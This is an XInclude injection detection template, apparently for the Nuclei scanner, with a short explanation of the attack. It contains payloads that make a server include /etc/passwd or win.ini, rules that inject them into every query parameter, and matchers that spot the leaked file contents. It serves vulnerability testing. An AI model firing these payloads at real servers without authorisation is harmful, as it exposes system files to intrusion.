XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
PoC代码[已公开]
id: xinclude-injection
info:
name: XInclude Injection - Detection
author: DhiyaneshDK,ritikchaddha
severity: high
description: |
XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
reference:
- https://d0pt3x.gitbook.io/passion/webapp-security/xxe-attacks/xinclude-attacks
tags: dast,xxe,xinclude,vuln
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
xinc_fuzz:
- '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></asd>'
- '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///c:/windows/win.ini"/></asd>'
fuzzing:
- part: query
type: replace # replaces existing parameter value with fuzz payload
mode: multiple # replaces all parameters value with fuzz payload
fuzz:
- '{{xinc_fuzz}}'
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
name: linux
part: body
regex:
- 'root:.*?:[0-9]*:[0-9]*:'
- type: word
name: windows
part: body
words:
- 'for 16-bit app support'
# digest: 4a0a00473045022100e69db58569b4f4e5f60abf7e90300e73b9999127ef3b07cc6e90798e22187bdd0220062843c2ed9f731d9b4985e0b587e5f3e8ac58c29aa83a84f18d21ca4dcda0e4:922c64590222798bb761d5b6d8e72950